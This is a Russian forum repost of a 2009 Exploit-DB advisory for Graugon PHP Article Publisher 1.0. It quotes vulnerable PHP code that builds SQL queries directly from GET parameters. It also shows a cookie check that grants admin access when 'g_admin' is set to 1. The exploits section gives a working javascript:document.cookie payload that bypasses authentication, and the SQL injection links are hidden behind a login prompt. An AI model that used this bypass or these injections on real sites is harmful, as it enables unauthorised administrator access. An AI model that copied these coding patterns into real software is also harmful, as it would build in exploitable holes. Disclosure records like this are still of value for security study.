- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8133
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4808 cve-2009-4807
- Дата публикации
- 2009-03-02
Код:
#########################################################################################
[0x01] Informations:
Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : [email protected]
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged Page: index.php [..] admin.php [..] view.php
[Code]
$c = $_GET['c'];
$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
Код:
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
Код:
$id = $_GET['id']; [..]
$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
#########################################################################################
[0x03] Exploits:
Exploits: Для просмотра ссылки Войди
Для просмотра ссылки Войди
javascript:document.cookie ="g_admin=1; path=/"
########################################################################################
# milw0rm.com [2009-03-02][/CODE]
- Источник
- www.exploit-db.com